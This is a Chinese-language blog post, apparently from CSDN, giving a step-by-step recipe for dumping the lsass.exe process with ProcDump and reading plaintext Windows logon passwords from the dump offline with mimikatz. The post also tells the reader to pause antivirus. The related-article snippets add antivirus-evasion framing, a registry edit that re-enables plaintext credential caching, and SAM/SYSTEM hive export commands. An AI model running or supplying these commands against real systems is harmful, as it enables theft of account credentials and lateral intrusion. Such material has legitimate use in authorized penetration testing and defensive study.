mimikatz+ProcDump离线读取win2008及以下用户密码

最新推荐文章于 2023-08-08 18:07:58 发布
最新推荐文章于 2023-08-08 18:07:58 发布
阅读量714 收藏
点赞数
分类专栏: 命令使用 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q996966912/article/details/126648479
版权

1、在微软官方网站下载ProcDump软件,下载地址如下:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

2、在win服务器上以管理员执行命令

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

此处只能导出在线的用户信息

3、生成lsass.dmp文件,将文件复制到本地计算机
4、在GitHub上下载mimikatz程序

https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210810-2

5、在本地计算机执行如下命令,此处需要暂停杀毒软件

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" > pssword.txt exit

6、查看pssword.txt文件中wdigest :中Password字段,win2008服务器以下版本为明文密码

q996966912
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 599
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
Windows密码破解常见手段
最新发布
2301_80127209的博客
05-11 977
值得一提的是,这个项目能过windows defender 进行dump lsass内存,且只把相关的内容给dump下来,非常的香!申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。这也是github上面的项目,很热乎,刚提交不交,被我无意间发现了,这就是个宝藏。
Windows 用户密码查看
10-21
Windows 用户密码查看\!(仅限于Windows XP及以下系统 2003本人没试过!) 仅供学习,请不要用于非法行为! 否者!后果自付!
windows2008用户名和密码
06-27 518
<br />1.管理工具》计算机管理》系统管理》本地用户和组》用户<br />默认是Administrator,右键重命名,即可更改用户名。设置密码即可更改密码。<br />注:在密码丢失时才使用此操作,但有可能丢失一些数据。如果只是改密码,可以ctrl+shift+delete去改。上面有提示<br />最后送给所有人的一句话:在你不知道怎么操作时,最好把每句提示都看一下。
mimikatz抓取明文密码Windows Server 2008 R2 x64)
CC's Blog
03-12 9182
使用方法如下: 1.privilege::debug 2.inject::process lsass.exe F:\tools\x64\sekurlsa.dll 3.@getLogonPasswords 有图有真相:
查看windows系统登录密码
01-09
在不更改系统任何文件的前提下可以查看现在登陆用户密码
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 3897
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
mimikatz密码读取.zip
04-16
在使用mimikatz进行密码读取时,我们通常按照以下步骤操作: 1. **安装与运行**:解压mimikatz.zip文件,其中包含了mimikatz的执行程序。在具备相应权限的环境中运行,如管理员权限。 2. **模块选择**:根据目标,...
procdump+mimikatz.zip
11-14
《深入理解procdumpmimikatz:网络安全分析与防护》 在IT安全领域,了解并掌握一些关键工具的使用至关重要,其中procdumpmimikatz就是两个经常被提及的名字。这两个工具虽然各自有着不同的功能,但在网络安全...
procdump32_64+mimikatz.rar
06-15
标题中的"procdump32_64+mimikatz.rar"表明这是一个包含32位和64位版本的procdump工具与mimikatz工具的压缩包。这两个工具在IT安全领域中有着重要的作用,特别是对于系统调试和安全审计。 **procdump** Procdump是...
清除Win 7与Windows Server 2008系统用户密码工具(含教程)
04-21
清除WIN7与windows server2008系统用户密码(压缩包里含WORD使用教程及视频教程) 视频里讲的是PasswordChanger启动光盘的使用方法,只有启动部分不一样,后边使用都是一样,一样,一样的 解压后包含四个文件:BOOTDISK.KEY、PasswordChanger.exe(主要用这个)、PWD_CHNG.EXE(dos下用的,不过WIN7&2008;系统的电脑估计没人用FAT32格式,试过在MAXDOS下加载NTFS FOR DOS后,也不能正常运行)、Settings.ini(这里边有序列号) 1. 用PE启动电脑 2. 运行PasswordChanger.exe,点下一步 ……
Windows用户密码查看工具
10-23
Windows用户密码查看工具 可以查看到所有版本Windows系统的用户密码。包括Vista,Win7。不过,只能在XP或者PE系统中才能查看到Vista,Win7的用户密码
Windows登陆密码查看工具
01-18
可以查看Windows登陆密码,32位、64位并附加源码
mimikatz猕猴桃渗透测试神器 读取密码 win10 不可用
04-27
mimikatz的核心功能在于读取和提取系统的敏感信息,包括但不限于密码、哈希值、密钥、证书等。它的工作原理是利用操作系统内核级的接口,来获取内存中的数据。这一特性使得mimikatz在进行安全审计时能够获取到实时且...
mimikatz获取系统密码
03-28
**mimikatz获取系统密码** 在网络安全领域,mimikatz是一款著名的工具,由法国安全研究员Benjamin Delpy开发。它主要用于提取操作系统中的敏感信息,如明文密码、NTLM哈希、kerberos票证等。mimikatz在渗透测试和...
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4474
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
Procdump+mimikatz绕过安全防护读取密码
xxx9686的博客
09-16 329
在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。使用procdump转储lsass进程。
导出lsass内存各种方法
qq_18193739的博客
08-08 1300
导出lsass内存各种方法,mimikatz读取密码
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 2692
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
mimikatz 读取 win10密码
03-16
Mimikatz是一款用于读取Windows系统密码的工具,可以在Win10系统中使用。它可以通过抓取系统内存中的密码信息,或者直接读取系统中的密码哈希值,来获取用户的登录密码。但是需要注意的是,使用Mimikatz读取他人密码是非法的行为,应该遵守相关法律法规。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值